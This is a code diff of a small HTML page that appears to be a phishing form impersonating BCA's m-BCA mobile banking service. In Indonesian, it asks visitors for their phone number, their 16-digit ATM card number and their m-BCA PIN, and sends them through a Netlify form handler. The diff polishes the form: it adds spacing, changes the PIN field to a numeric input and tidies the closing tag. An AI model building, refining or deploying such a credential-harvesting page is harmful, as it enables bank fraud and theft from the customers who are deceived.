--- a/input.html
+++ b/input.html
@@ -19,13 +19,13 @@
   <div>
     <img src="https://res.cloudinary.com/codelifings/image/upload/v1613365398/Tak_berjudul43_20210215120201_np8fkd.png" alt="">
   </div>
-
+  <br><br>
     <form method="POST" name="BCA mobilee" data-netlify="true">
       <input class="u-full-width" type="number" placeholder="Nomor Handphone" id="handphone">
       <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomor-atm">
-      <input class="u-full-width" type="email" placeholder="Masukkan Pin m-BCA Anda" id="pin">
+      <input class="u-full-width" type="number" placeholder="Masukkan Pin m-BCA Anda" id="pin">
       <input style="float: right" class="button-primary" type="submit" value="OK">
-</form>
+    </form>
 
 </body>
 </html>
